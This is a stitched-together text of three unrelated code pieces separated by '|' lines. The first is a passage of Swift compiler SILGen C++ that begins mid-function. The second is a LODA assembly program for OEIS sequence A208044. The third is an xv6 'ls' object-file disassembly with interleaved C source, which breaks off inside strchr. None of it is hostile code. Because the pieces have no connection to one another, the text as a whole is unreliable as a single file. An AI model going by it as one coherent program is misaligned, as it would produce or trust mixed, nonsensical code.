MagicFunctionName = SILGenModule::getMagicFunctionName(function);
RegularLocation Loc(value);
Loc.markAutoGenerated();
// If a default argument or stored property initializer value is a noescape
// function type, strip the escape to noescape function conversion.
if (function.kind == SILDeclRef::Kind::DefaultArgGenerator ||
function.kind == SILDeclRef::Kind::StoredPropertyInitializer) {
if (auto funType = value->getType()->getAs<AnyFunctionType>()) {
if (funType->getExtInfo().isNoEscape()) {
auto conv = cast<FunctionConversionExpr>(value);
value = conv->getSubExpr();
assert(funType->withExtInfo(funType->getExtInfo().withNoEscape(false))
->isEqual(value->getType()));
}
}
}
// For a property wrapper backing initializer, form a parameter list
// containing the wrapped or projected value.
ParameterList *params = nullptr;
if (function.kind == SILDeclRef::Kind::PropertyWrapperBackingInitializer ||
function.kind == SILDeclRef::Kind::PropertyWrapperInitFromProjectedValue) {
auto &ctx = getASTContext();
// Synthesize an implicit, owned "$input_value" parameter that carries
// the wrapped (or projected) value into the initializer.
auto param = new (ctx) ParamDecl(SourceLoc(), SourceLoc(),
ctx.getIdentifier("$input_value"),
SourceLoc(),
ctx.getIdentifier("$input_value"),
dc);
param->setSpecifier(ParamSpecifier::Owned);
param->setImplicit();
auto vd = cast<VarDecl>(function.getDecl());
if (function.kind == SILDeclRef::Kind::PropertyWrapperBackingInitializer) {
param->setInterfaceType(vd->getPropertyWrapperInitValueInterfaceType());
} else {
auto *placeholder =
vd->getPropertyWrapperInitializerInfo().getProjectedValuePlaceholder();
auto interfaceType = placeholder->getType();
if (interfaceType->hasArchetype())
interfaceType = interfaceType->mapTypeOutOfContext();
param->setInterfaceType(interfaceType);
}
params = ParameterList::create(ctx, SourceLoc(), {param}, SourceLoc());
}
auto captureInfo = SGM.M.Types.getLoweredLocalCaptures(function);
auto interfaceType = value->getType()->mapTypeOutOfContext();
emitProlog(captureInfo, params, /*selfParam=*/nullptr,
dc, interfaceType, /*throws=*/false, SourceLoc());
if (EmitProfilerIncrement)
emitProfilerIncrement(value);
prepareEpilog(interfaceType, false, CleanupLocation(Loc));
{
llvm::Optional<SILGenFunction::OpaqueValueRAII> opaqueValue;
// For a property wrapper backing initializer, bind the opaque value used
// in the initializer expression to the given parameter.
if (function.kind == SILDeclRef::Kind::PropertyWrapperBackingInitializer) {
auto var = cast<VarDecl>(function.getDecl());
auto initInfo = var->getPropertyWrapperInitializerInfo();
auto param = params->get(0);
auto *placeholder = initInfo.getWrappedValuePlaceholder();
opaqueValue.emplace(
*this, placeholder->getOpaqueValuePlaceholder(),
maybeEmitValueOfLocalVarDecl(param, AccessKind::Read));
assert(value == initInfo.getInitFromWrappedValue());
} else if (function.kind == SILDeclRef::Kind::PropertyWrapperInitFromProjectedValue) {
auto var = cast<VarDecl>(function.getDecl());
auto initInfo = var->getPropertyWrapperInitializerInfo();
auto param = params->get(0);
auto *placeholder = initInfo.getProjectedValuePlaceholder();
opaqueValue.emplace(
*this, placeholder->getOpaqueValuePlaceholder(),
maybeEmitValueOfLocalVarDecl(param, AccessKind::Read));
assert(value == initInfo.getInitFromProjectedValue());
}
// Evaluate the expression and return it (the opaque-value binding, if
// any, stays live for the duration of the emission).
emitReturnExpr(Loc, value);
}
emitEpilog(Loc);
mergeCleanupBlocks();
}
/// Emit a function that runs the stored-property initializer for \p var and
/// returns the initialized value, either through indirect SIL results or
/// directly, depending on this function's conventions.
void SILGenFunction::emitGeneratorFunction(SILDeclRef function, VarDecl *var) {
MagicFunctionName = SILGenModule::getMagicFunctionName(function);
RegularLocation loc(var);
loc.markAutoGenerated();
auto decl = function.getAbstractFunctionDecl();
auto *dc = decl->getInnermostDeclContext();
auto interfaceType = var->getValueInterfaceType();
// If this is the backing storage for a property with an attached
// wrapper that was initialized with '=', the stored property initializer
// will be in terms of the original property's type.
if (auto originalProperty = var->getOriginalWrappedProperty()) {
if (originalProperty->isPropertyMemberwiseInitializedWithWrappedType()) {
interfaceType = originalProperty->getPropertyWrapperInitValueInterfaceType();
if (auto fnType = interfaceType->getAs<AnyFunctionType>()) {
// Use the escaping form of any function-typed initial value.
auto newExtInfo = fnType->getExtInfo().withNoEscape(false);
interfaceType = fnType->withExtInfo(newExtInfo);
}
}
}
emitBasicProlog(/*paramList*/ nullptr, /*selfParam*/ nullptr,
interfaceType, dc, /*throws=*/ false,SourceLoc());
prepareEpilog(interfaceType, false, CleanupLocation(loc));
// The initializer expression is anchored on the pattern-binding entry for
// this var.
auto pbd = var->getParentPatternBinding();
const auto i = pbd->getPatternEntryIndexForVarDecl(var);
auto *anchorVar = pbd->getAnchoringVarDecl(i);
auto subs = getForwardingSubstitutionMap();
auto contextualType = dc->mapTypeIntoContext(interfaceType);
auto resultType = contextualType->getCanonicalType();
auto origResultType = AbstractionPattern(resultType);
SmallVector<SILValue, 4> directResults;
if (F.getConventions().hasIndirectSILResults()) {
// Indirect convention: initialize the caller-provided result buffers in
// place, then forward the cleanups so the values survive the scope.
Scope scope(Cleanups, CleanupLocation(var));
SmallVector<CleanupHandle, 4> cleanups;
auto init = prepareIndirectResultInit(AbstractionPattern(resultType),
resultType, directResults, cleanups);
emitApplyOfStoredPropertyInitializer(loc, anchorVar, subs, resultType,
origResultType,
SGFContext(init.get()));
for (auto cleanup : cleanups) {
Cleanups.forwardCleanup(cleanup);
}
} else {
Scope scope(Cleanups, CleanupLocation(var));
// If we have no indirect results, just return the result.
auto result = emitApplyOfStoredPropertyInitializer(loc, anchorVar, subs,
resultType,
origResultType,
SGFContext())
.ensurePlusOne(*this, loc);
std::move(result).forwardAll(*this, directResults);
}
Cleanups.emitBranchAndCleanups(ReturnDest, loc, directResults);
emitEpilog(loc);
}
/// Convert an ASTNode (which wraps an Expr, Stmt, or Decl) into a
/// SILLocation anchored at that node. Any other node kind is a
/// programmer error.
static SILLocation getLocation(ASTNode Node) {
  if (auto *expr = Node.dyn_cast<Expr *>())
    return expr;
  if (auto *stmt = Node.dyn_cast<Stmt *>())
    return stmt;
  if (auto *decl = Node.dyn_cast<Decl *>())
    return decl;
  llvm_unreachable("unsupported ASTNode");
}
/// Emit an int_instrprof_increment builtin call bumping the PGO region
/// counter mapped to AST node \p N.
///
/// Does nothing when this function carries no profiler, when the profiler
/// has no region counters, or when an existing profile is being consumed
/// (UseProfile is set) rather than generated.
void SILGenFunction::emitProfilerIncrement(ASTNode N) {
// Ignore functions which aren't set up for instrumentation.
SILProfiler *SP = F.getProfiler();
if (!SP)
return;
if (!SP->hasRegionCounters() || !getModule().getOptions().UseProfile.empty())
return;
auto &C = B.getASTContext();
const auto &RegionCounterMap = SP->getRegionCounterMap();
auto CounterIt = RegionCounterMap.find(N);
// TODO: Assert that this cannot happen (rdar://42792053).
if (CounterIt == RegionCounterMap.end())
return;
auto Int32Ty = getLoweredType(BuiltinIntegerType::get(32, C));
auto Int64Ty = getLoweredType(BuiltinIntegerType::get(64, C));
SILLocation Loc = getLocation(N);
// Arguments of the increment intrinsic: PGO function name, function hash,
// total number of counters, and the index of the counter to bump.
SILValue Args[] = {
// The intrinsic must refer to the function profiling name var, which is
// inaccessible during SILGen. Rely on irgen to rewrite the function name.
B.createStringLiteral(Loc, SP->getPGOFuncName(),
StringLiteralInst::Encoding::UTF8),
B.createIntegerLiteral(Loc, Int64Ty, SP->getPGOFuncHash()),
B.createIntegerLiteral(Loc, Int32Ty, SP->getNumRegionCounters()),
B.createIntegerLiteral(Loc, Int32Ty, CounterIt->second)};
B.createBuiltin(
Loc,
C.getIdentifier(getBuiltinName(BuiltinValueKind::IntInstrprofIncrement)),
SGM.Types.getEmptyTupleType(), {}, Args);
}
/// Return the recorded execution count for \p Node, or an empty
/// ProfileCounter when this function has no profiler attached.
ProfileCounter SILGenFunction::loadProfilerCount(ASTNode Node) const {
  SILProfiler *profiler = F.getProfiler();
  if (!profiler)
    return ProfileCounter();
  return profiler->getExecutionCount(Node);
}
/// Return the PGO parent node of \p Node as recorded by the profiler, or
/// None when this function has no profiler attached.
Optional<ASTNode> SILGenFunction::getPGOParent(ASTNode Node) const {
  SILProfiler *profiler = F.getProfiler();
  if (!profiler)
    return None;
  return profiler->getPGOParent(Node);
}
/// Strip single-field struct wrappers off \p value until a builtin integer
/// remains, and return that underlying value.
SILValue SILGenFunction::emitUnwrapIntegerResult(SILLocation loc,
                                                 SILValue value) {
  // Wrapper types may nest (e.g. ObjCBool wrapping Bool wrapping a builtin
  // integer), so keep extracting the single stored field until the type is
  // a BuiltinIntegerType.
  while (!value->getType().is<BuiltinIntegerType>()) {
    auto *wrapper = value->getType().getStructOrBoundGenericStruct();
    assert(wrapper && "value for error result wasn't of struct type!");
    assert(wrapper->getStoredProperties().size() == 1);
    auto *field = wrapper->getStoredProperties()[0];
    value = B.createStructExtract(loc, value, field);
  }
  return value;
}
/// Emit an integer literal of type \p ty, wrapping it through any chain of
/// single-field struct types (e.g. ObjCBool over Bool over a builtin
/// integer) down to the underlying builtin integer.
SILValue SILGenFunction::emitWrapIntegerLiteral(SILLocation loc,
                                                SILType ty,
                                                unsigned value) {
  // Base case: the type already is a builtin integer; emit the literal
  // directly.
  if (ty.getAs<BuiltinIntegerType>())
    return B.createIntegerLiteral(loc, ty, value);
  // Recursive case: build the literal for the struct's unique stored field,
  // then wrap it in the struct.
  auto *wrapper = ty.getStructOrBoundGenericStruct();
  assert(wrapper && "value for error result wasn't of struct type!");
  assert(wrapper->getStoredProperties().size() == 1);
  auto *field = wrapper->getStoredProperties()[0];
  auto fieldTy = ty.getFieldType(field, SGM.Types, getTypeExpansionContext());
  auto wrapped = emitWrapIntegerLiteral(loc, fieldTy, value);
  return B.createStruct(loc, ty, wrapped);
}
|
; A208044: Number of n X 3 0..3 arrays with new values 0..3 introduced in row major order and no element equal to any horizontal, vertical or antidiagonal neighbor (colorings ignoring permutations of colors).
; 2,8,44,244,1356,7540,41932,233204,1296972,7213172,40116428,223109620,1240835916,6900974452,38380133836,213453141236,1187130917964,6602291295860,36718991727308,204214611724276,1135750348251468,6316535543966068
; Registers: $0 = input n, consumed as the loop counter; $1 = current term
; (starts at a(0)=2 and presumably serves as the output register — TODO
; confirm against the LODA runtime's output convention); $2 = running sum
; of terms; $3 = work register holding the next term.
mov $1,2
mov $3,1
; Repeat n times: $2 += $1; $3 = 2*(2*($3 + $1) - $2); $1 = $3.
lpb $0,1
sub $0,1
add $2,$1
add $3,$1
mul $3,2
sub $3,$2
mul $3,2
mov $1,$3
lpe
|
_ls: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
break;
}
close(fd);
}
int main(int argc, char *argv[]) {
0: 8d 4c 24 04 lea 0x4(%esp),%ecx
4: 83 e4 f0 and $0xfffffff0,%esp
7: ff 71 fc pushl -0x4(%ecx)
a: 55 push %ebp
b: 89 e5 mov %esp,%ebp
d: 57 push %edi
e: 56 push %esi
f: 53 push %ebx
10: 51 push %ecx
11: bb 01 00 00 00 mov $0x1,%ebx
16: 83 ec 08 sub $0x8,%esp
19: 8b 31 mov (%ecx),%esi
1b: 8b 79 04 mov 0x4(%ecx),%edi
int i;
if(argc < 2){
1e: 83 fe 01 cmp $0x1,%esi
21: 7e 1f jle 42 <main+0x42>
23: 90 nop
24: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
ls(".");
exit();
}
for(i=1; i<argc; i++)
ls(argv[i]);
28: 83 ec 0c sub $0xc,%esp
2b: ff 34 9f pushl (%edi,%ebx,4)
if(argc < 2){
ls(".");
exit();
}
for(i=1; i<argc; i++)
2e: 83 c3 01 add $0x1,%ebx
ls(argv[i]);
31: e8 ca 00 00 00 call 100 <ls>
if(argc < 2){
ls(".");
exit();
}
for(i=1; i<argc; i++)
36: 83 c4 10 add $0x10,%esp
39: 39 de cmp %ebx,%esi
3b: 75 eb jne 28 <main+0x28>
ls(argv[i]);
exit();
3d: e8 40 05 00 00 call 582 <exit>
int main(int argc, char *argv[]) {
int i;
if(argc < 2){
ls(".");
42: 83 ec 0c sub $0xc,%esp
45: 68 38 0a 00 00 push $0xa38
4a: e8 b1 00 00 00 call 100 <ls>
exit();
4f: e8 2e 05 00 00 call 582 <exit>
54: 66 90 xchg %ax,%ax
56: 66 90 xchg %ax,%ax
58: 66 90 xchg %ax,%ax
5a: 66 90 xchg %ax,%ax
5c: 66 90 xchg %ax,%ax
5e: 66 90 xchg %ax,%ax
00000060 <fmtname>:
#include "user.h"
#include "fs.h"
char*
fmtname(char *path)
{
60: 55 push %ebp
61: 89 e5 mov %esp,%ebp
63: 56 push %esi
64: 53 push %ebx
65: 8b 5d 08 mov 0x8(%ebp),%ebx
static char buf[DIRSIZ+1];
char *p;
// Find first character after last slash.
for(p=path+strlen(path); p >= path && *p != '/'; p--);
68: 83 ec 0c sub $0xc,%esp
6b: 53 push %ebx
6c: e8 4f 03 00 00 call 3c0 <strlen>
71: 83 c4 10 add $0x10,%esp
74: 01 d8 add %ebx,%eax
76: 73 0f jae 87 <fmtname+0x27>
78: eb 12 jmp 8c <fmtname+0x2c>
7a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
80: 83 e8 01 sub $0x1,%eax
83: 39 c3 cmp %eax,%ebx
85: 77 05 ja 8c <fmtname+0x2c>
87: 80 38 2f cmpb $0x2f,(%eax)
8a: 75 f4 jne 80 <fmtname+0x20>
p++;
8c: 8d 58 01 lea 0x1(%eax),%ebx
// Return blank-padded name.
if(strlen(p) >= DIRSIZ){
8f: 83 ec 0c sub $0xc,%esp
92: 53 push %ebx
93: e8 28 03 00 00 call 3c0 <strlen>
98: 83 c4 10 add $0x10,%esp
9b: 83 f8 0d cmp $0xd,%eax
9e: 77 4a ja ea <fmtname+0x8a>
return p;
}
memmove(buf, p, strlen(p));
a0: 83 ec 0c sub $0xc,%esp
a3: 53 push %ebx
a4: e8 17 03 00 00 call 3c0 <strlen>
a9: 83 c4 0c add $0xc,%esp
ac: 50 push %eax
ad: 53 push %ebx
ae: 68 50 0d 00 00 push $0xd50
b3: e8 98 04 00 00 call 550 <memmove>
memset(buf+strlen(p), ' ', DIRSIZ-strlen(p));
b8: 89 1c 24 mov %ebx,(%esp)
bb: e8 00 03 00 00 call 3c0 <strlen>
c0: 89 1c 24 mov %ebx,(%esp)
c3: 89 c6 mov %eax,%esi
return buf;
c5: bb 50 0d 00 00 mov $0xd50,%ebx
// Return blank-padded name.
if(strlen(p) >= DIRSIZ){
return p;
}
memmove(buf, p, strlen(p));
memset(buf+strlen(p), ' ', DIRSIZ-strlen(p));
ca: e8 f1 02 00 00 call 3c0 <strlen>
cf: ba 0e 00 00 00 mov $0xe,%edx
d4: 83 c4 0c add $0xc,%esp
d7: 05 50 0d 00 00 add $0xd50,%eax
dc: 29 f2 sub %esi,%edx
de: 52 push %edx
df: 6a 20 push $0x20
e1: 50 push %eax
e2: e8 09 03 00 00 call 3f0 <memset>
return buf;
e7: 83 c4 10 add $0x10,%esp
}
ea: 8d 65 f8 lea -0x8(%ebp),%esp
ed: 89 d8 mov %ebx,%eax
ef: 5b pop %ebx
f0: 5e pop %esi
f1: 5d pop %ebp
f2: c3 ret
f3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000100 <ls>:
void ls(char *path) {
100: 55 push %ebp
101: 89 e5 mov %esp,%ebp
103: 57 push %edi
104: 56 push %esi
105: 53 push %ebx
106: 81 ec 64 02 00 00 sub $0x264,%esp
10c: 8b 7d 08 mov 0x8(%ebp),%edi
char buf[512], *p;
int fd;
struct dirent de;
struct stat st;
if((fd = open(path, 0)) < 0){
10f: 6a 00 push $0x0
111: 57 push %edi
112: e8 ab 04 00 00 call 5c2 <open>
117: 83 c4 10 add $0x10,%esp
11a: 85 c0 test %eax,%eax
11c: 0f 88 9e 01 00 00 js 2c0 <ls+0x1c0>
printf(2, "ls: cannot open %s\n", path);
return;
}
if(fstat(fd, &st) < 0){
122: 8d b5 d4 fd ff ff lea -0x22c(%ebp),%esi
128: 83 ec 08 sub $0x8,%esp
12b: 89 c3 mov %eax,%ebx
12d: 56 push %esi
12e: 50 push %eax
12f: e8 a6 04 00 00 call 5da <fstat>
134: 83 c4 10 add $0x10,%esp
137: 85 c0 test %eax,%eax
139: 0f 88 c1 01 00 00 js 300 <ls+0x200>
printf(2, "ls: cannot stat %s\n", path);
close(fd);
return;
}
switch(st.type){
13f: 0f b7 85 d4 fd ff ff movzwl -0x22c(%ebp),%eax
146: 66 83 f8 01 cmp $0x1,%ax
14a: 74 54 je 1a0 <ls+0xa0>
14c: 66 83 f8 02 cmp $0x2,%ax
150: 75 37 jne 189 <ls+0x89>
case T_FILE:
printf(1, "%s %d %d %d\n", fmtname(path), st.type, st.ino, st.size);
152: 83 ec 0c sub $0xc,%esp
155: 8b 95 e4 fd ff ff mov -0x21c(%ebp),%edx
15b: 8b b5 dc fd ff ff mov -0x224(%ebp),%esi
161: 57 push %edi
162: 89 95 b4 fd ff ff mov %edx,-0x24c(%ebp)
168: e8 f3 fe ff ff call 60 <fmtname>
16d: 8b 95 b4 fd ff ff mov -0x24c(%ebp),%edx
173: 59 pop %ecx
174: 5f pop %edi
175: 52 push %edx
176: 56 push %esi
177: 6a 02 push $0x2
179: 50 push %eax
17a: 68 18 0a 00 00 push $0xa18
17f: 6a 01 push $0x1
181: e8 4a 05 00 00 call 6d0 <printf>
break;
186: 83 c4 20 add $0x20,%esp
}
printf(1, "%s %d %d %d\n", fmtname(buf), st.type, st.ino, st.size);
}
break;
}
close(fd);
189: 83 ec 0c sub $0xc,%esp
18c: 53 push %ebx
18d: e8 18 04 00 00 call 5aa <close>
192: 83 c4 10 add $0x10,%esp
}
195: 8d 65 f4 lea -0xc(%ebp),%esp
198: 5b pop %ebx
199: 5e pop %esi
19a: 5f pop %edi
19b: 5d pop %ebp
19c: c3 ret
19d: 8d 76 00 lea 0x0(%esi),%esi
case T_FILE:
printf(1, "%s %d %d %d\n", fmtname(path), st.type, st.ino, st.size);
break;
case T_DIR:
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
1a0: 83 ec 0c sub $0xc,%esp
1a3: 57 push %edi
1a4: e8 17 02 00 00 call 3c0 <strlen>
1a9: 83 c0 10 add $0x10,%eax
1ac: 83 c4 10 add $0x10,%esp
1af: 3d 00 02 00 00 cmp $0x200,%eax
1b4: 0f 87 26 01 00 00 ja 2e0 <ls+0x1e0>
printf(1, "ls: path too long\n");
break;
}
strcpy(buf, path);
1ba: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
1c0: 83 ec 08 sub $0x8,%esp
1c3: 57 push %edi
1c4: 8d bd c4 fd ff ff lea -0x23c(%ebp),%edi
1ca: 50 push %eax
1cb: e8 70 01 00 00 call 340 <strcpy>
p = buf+strlen(buf);
1d0: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
1d6: 89 04 24 mov %eax,(%esp)
1d9: e8 e2 01 00 00 call 3c0 <strlen>
1de: 8d 95 e8 fd ff ff lea -0x218(%ebp),%edx
*p++ = '/';
while(read(fd, &de, sizeof(de)) == sizeof(de)){
1e4: 83 c4 10 add $0x10,%esp
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
printf(1, "ls: path too long\n");
break;
}
strcpy(buf, path);
p = buf+strlen(buf);
1e7: 8d 0c 02 lea (%edx,%eax,1),%ecx
*p++ = '/';
1ea: 8d 84 05 e9 fd ff ff lea -0x217(%ebp,%eax,1),%eax
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
printf(1, "ls: path too long\n");
break;
}
strcpy(buf, path);
p = buf+strlen(buf);
1f1: 89 8d a8 fd ff ff mov %ecx,-0x258(%ebp)
*p++ = '/';
1f7: 89 85 a4 fd ff ff mov %eax,-0x25c(%ebp)
1fd: c6 01 2f movb $0x2f,(%ecx)
while(read(fd, &de, sizeof(de)) == sizeof(de)){
200: 83 ec 04 sub $0x4,%esp
203: 6a 10 push $0x10
205: 57 push %edi
206: 53 push %ebx
207: e8 8e 03 00 00 call 59a <read>
20c: 83 c4 10 add $0x10,%esp
20f: 83 f8 10 cmp $0x10,%eax
212: 0f 85 71 ff ff ff jne 189 <ls+0x89>
if(de.inum == 0)
218: 66 83 bd c4 fd ff ff cmpw $0x0,-0x23c(%ebp)
21f: 00
220: 74 de je 200 <ls+0x100>
continue;
memmove(p, de.name, DIRSIZ);
222: 8d 85 c6 fd ff ff lea -0x23a(%ebp),%eax
228: 83 ec 04 sub $0x4,%esp
22b: 6a 0e push $0xe
22d: 50 push %eax
22e: ff b5 a4 fd ff ff pushl -0x25c(%ebp)
234: e8 17 03 00 00 call 550 <memmove>
p[DIRSIZ] = 0;
239: 8b 85 a8 fd ff ff mov -0x258(%ebp),%eax
23f: c6 40 0f 00 movb $0x0,0xf(%eax)
if(stat(buf, &st) < 0){
243: 58 pop %eax
244: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
24a: 5a pop %edx
24b: 56 push %esi
24c: 50 push %eax
24d: e8 6e 02 00 00 call 4c0 <stat>
252: 83 c4 10 add $0x10,%esp
255: 85 c0 test %eax,%eax
257: 0f 88 c3 00 00 00 js 320 <ls+0x220>
printf(1, "ls: cannot stat %s\n", buf);
continue;
}
printf(1, "%s %d %d %d\n", fmtname(buf), st.type, st.ino, st.size);
25d: 8b 8d e4 fd ff ff mov -0x21c(%ebp),%ecx
263: 0f bf 85 d4 fd ff ff movswl -0x22c(%ebp),%eax
26a: 83 ec 0c sub $0xc,%esp
26d: 8b 95 dc fd ff ff mov -0x224(%ebp),%edx
273: 89 8d ac fd ff ff mov %ecx,-0x254(%ebp)
279: 8d 8d e8 fd ff ff lea -0x218(%ebp),%ecx
27f: 89 95 b0 fd ff ff mov %edx,-0x250(%ebp)
285: 89 85 b4 fd ff ff mov %eax,-0x24c(%ebp)
28b: 51 push %ecx
28c: e8 cf fd ff ff call 60 <fmtname>
291: 5a pop %edx
292: 8b 95 b0 fd ff ff mov -0x250(%ebp),%edx
298: 59 pop %ecx
299: 8b 8d ac fd ff ff mov -0x254(%ebp),%ecx
29f: 51 push %ecx
2a0: 52 push %edx
2a1: ff b5 b4 fd ff ff pushl -0x24c(%ebp)
2a7: 50 push %eax
2a8: 68 18 0a 00 00 push $0xa18
2ad: 6a 01 push $0x1
2af: e8 1c 04 00 00 call 6d0 <printf>
2b4: 83 c4 20 add $0x20,%esp
2b7: e9 44 ff ff ff jmp 200 <ls+0x100>
2bc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
int fd;
struct dirent de;
struct stat st;
if((fd = open(path, 0)) < 0){
printf(2, "ls: cannot open %s\n", path);
2c0: 83 ec 04 sub $0x4,%esp
2c3: 57 push %edi
2c4: 68 f0 09 00 00 push $0x9f0
2c9: 6a 02 push $0x2
2cb: e8 00 04 00 00 call 6d0 <printf>
return;
2d0: 83 c4 10 add $0x10,%esp
printf(1, "%s %d %d %d\n", fmtname(buf), st.type, st.ino, st.size);
}
break;
}
close(fd);
}
2d3: 8d 65 f4 lea -0xc(%ebp),%esp
2d6: 5b pop %ebx
2d7: 5e pop %esi
2d8: 5f pop %edi
2d9: 5d pop %ebp
2da: c3 ret
2db: 90 nop
2dc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
printf(1, "%s %d %d %d\n", fmtname(path), st.type, st.ino, st.size);
break;
case T_DIR:
if(strlen(path) + 1 + DIRSIZ + 1 > sizeof buf){
printf(1, "ls: path too long\n");
2e0: 83 ec 08 sub $0x8,%esp
2e3: 68 25 0a 00 00 push $0xa25
2e8: 6a 01 push $0x1
2ea: e8 e1 03 00 00 call 6d0 <printf>
break;
2ef: 83 c4 10 add $0x10,%esp
2f2: e9 92 fe ff ff jmp 189 <ls+0x89>
2f7: 89 f6 mov %esi,%esi
2f9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
printf(2, "ls: cannot open %s\n", path);
return;
}
if(fstat(fd, &st) < 0){
printf(2, "ls: cannot stat %s\n", path);
300: 83 ec 04 sub $0x4,%esp
303: 57 push %edi
304: 68 04 0a 00 00 push $0xa04
309: 6a 02 push $0x2
30b: e8 c0 03 00 00 call 6d0 <printf>
close(fd);
310: 89 1c 24 mov %ebx,(%esp)
313: e8 92 02 00 00 call 5aa <close>
return;
318: 83 c4 10 add $0x10,%esp
31b: e9 75 fe ff ff jmp 195 <ls+0x95>
if(de.inum == 0)
continue;
memmove(p, de.name, DIRSIZ);
p[DIRSIZ] = 0;
if(stat(buf, &st) < 0){
printf(1, "ls: cannot stat %s\n", buf);
320: 8d 85 e8 fd ff ff lea -0x218(%ebp),%eax
326: 83 ec 04 sub $0x4,%esp
329: 50 push %eax
32a: 68 04 0a 00 00 push $0xa04
32f: 6a 01 push $0x1
331: e8 9a 03 00 00 call 6d0 <printf>
continue;
336: 83 c4 10 add $0x10,%esp
339: e9 c2 fe ff ff jmp 200 <ls+0x100>
33e: 66 90 xchg %ax,%ax
00000340 <strcpy>:
#include "user.h"
#include "x86.h"
char*
strcpy(char *s, char *t)
{
340: 55 push %ebp
341: 89 e5 mov %esp,%ebp
343: 53 push %ebx
344: 8b 45 08 mov 0x8(%ebp),%eax
347: 8b 4d 0c mov 0xc(%ebp),%ecx
char *os;
os = s;
while((*s++ = *t++) != 0)
34a: 89 c2 mov %eax,%edx
34c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
350: 83 c1 01 add $0x1,%ecx
353: 0f b6 59 ff movzbl -0x1(%ecx),%ebx
357: 83 c2 01 add $0x1,%edx
35a: 84 db test %bl,%bl
35c: 88 5a ff mov %bl,-0x1(%edx)
35f: 75 ef jne 350 <strcpy+0x10>
;
return os;
}
361: 5b pop %ebx
362: 5d pop %ebp
363: c3 ret
364: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
36a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi
00000370 <strcmp>:
int
strcmp(const char *p, const char *q)
{
370: 55 push %ebp
371: 89 e5 mov %esp,%ebp
373: 56 push %esi
374: 53 push %ebx
375: 8b 55 08 mov 0x8(%ebp),%edx
378: 8b 4d 0c mov 0xc(%ebp),%ecx
while(*p && *p == *q)
37b: 0f b6 02 movzbl (%edx),%eax
37e: 0f b6 19 movzbl (%ecx),%ebx
381: 84 c0 test %al,%al
383: 75 1e jne 3a3 <strcmp+0x33>
385: eb 29 jmp 3b0 <strcmp+0x40>
387: 89 f6 mov %esi,%esi
389: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
p++, q++;
390: 83 c2 01 add $0x1,%edx
}
int
strcmp(const char *p, const char *q)
{
while(*p && *p == *q)
393: 0f b6 02 movzbl (%edx),%eax
p++, q++;
396: 8d 71 01 lea 0x1(%ecx),%esi
}
int
strcmp(const char *p, const char *q)
{
while(*p && *p == *q)
399: 0f b6 59 01 movzbl 0x1(%ecx),%ebx
39d: 84 c0 test %al,%al
39f: 74 0f je 3b0 <strcmp+0x40>
3a1: 89 f1 mov %esi,%ecx
3a3: 38 d8 cmp %bl,%al
3a5: 74 e9 je 390 <strcmp+0x20>
p++, q++;
return (uchar)*p - (uchar)*q;
3a7: 29 d8 sub %ebx,%eax
}
3a9: 5b pop %ebx
3aa: 5e pop %esi
3ab: 5d pop %ebp
3ac: c3 ret
3ad: 8d 76 00 lea 0x0(%esi),%esi
}
int
strcmp(const char *p, const char *q)
{
while(*p && *p == *q)
3b0: 31 c0 xor %eax,%eax
p++, q++;
return (uchar)*p - (uchar)*q;
3b2: 29 d8 sub %ebx,%eax
}
3b4: 5b pop %ebx
3b5: 5e pop %esi
3b6: 5d pop %ebp
3b7: c3 ret
3b8: 90 nop
3b9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
000003c0 <strlen>:
uint
strlen(char *s)
{
3c0: 55 push %ebp
3c1: 89 e5 mov %esp,%ebp
3c3: 8b 4d 08 mov 0x8(%ebp),%ecx
int n;
for(n = 0; s[n]; n++)
3c6: 80 39 00 cmpb $0x0,(%ecx)
3c9: 74 12 je 3dd <strlen+0x1d>
3cb: 31 d2 xor %edx,%edx
3cd: 8d 76 00 lea 0x0(%esi),%esi
3d0: 83 c2 01 add $0x1,%edx
3d3: 80 3c 11 00 cmpb $0x0,(%ecx,%edx,1)
3d7: 89 d0 mov %edx,%eax
3d9: 75 f5 jne 3d0 <strlen+0x10>
;
return n;
}
3db: 5d pop %ebp
3dc: c3 ret
uint
strlen(char *s)
{
int n;
for(n = 0; s[n]; n++)
3dd: 31 c0 xor %eax,%eax
;
return n;
}
3df: 5d pop %ebp
3e0: c3 ret
3e1: eb 0d jmp 3f0 <memset>
3e3: 90 nop
3e4: 90 nop
3e5: 90 nop
3e6: 90 nop
3e7: 90 nop
3e8: 90 nop
3e9: 90 nop
3ea: 90 nop
3eb: 90 nop
3ec: 90 nop
3ed: 90 nop
3ee: 90 nop
3ef: 90 nop
000003f0 <memset>:
void*
memset(void *dst, int c, uint n)
{
3f0: 55 push %ebp
3f1: 89 e5 mov %esp,%ebp
3f3: 57 push %edi
3f4: 8b 55 08 mov 0x8(%ebp),%edx
}
static inline void
stosb(void *addr, int data, int cnt)
{
asm volatile("cld; rep stosb" :
3f7: 8b 4d 10 mov 0x10(%ebp),%ecx
3fa: 8b 45 0c mov 0xc(%ebp),%eax
3fd: 89 d7 mov %edx,%edi
3ff: fc cld
400: f3 aa rep stos %al,%es:(%edi)
stosb(dst, c, n);
return dst;
}
402: 89 d0 mov %edx,%eax
404: 5f pop %edi
405: 5d pop %ebp
406: c3 ret
407: 89 f6 mov %esi,%esi
409: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
00000410 <strchr>:
char*
strchr(const char *s, char c)
{
410: 55 push %ebp
411: 89 e5 mov %esp,%ebp
413: 53 push %ebx
